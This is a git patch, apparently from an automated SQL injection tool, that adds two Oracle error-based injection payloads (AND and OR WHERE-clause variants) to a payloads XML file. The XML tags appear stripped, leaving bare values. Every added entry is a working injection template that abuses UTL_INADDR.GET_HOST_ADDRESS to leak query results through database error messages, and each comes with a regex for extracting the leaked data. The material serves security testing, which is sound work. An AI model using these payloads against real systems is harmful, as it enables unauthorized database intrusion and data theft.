From 956a1553774059f8b6a22882f7b2920abd27a15e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 6 Dec 2010 20:43:23 +0000 Subject: [PATCH] adding one more error based payload for Oracle --- xml/payloads.xml | 38 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) diff --git a/xml/payloads.xml b/xml/payloads.xml index 2dcbe36d2..03ef44f89 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -773,6 +773,25 @@ Formats: + + Oracle AND error-based - WHERE clause (utl_inaddr.get_host_address) + 2 + 2 + 0 + 1 + 1 + AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]') + + AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ Firebird AND error-based - WHERE clause 2 @@ -869,6 +888,25 @@ Formats: + + Oracle OR error-based - WHERE clause (utl_inaddr.get_host_address) + 2 + 3 + 2 + 1 + 2 + OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]') + + OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ Firebird OR error-based - WHERE clause 2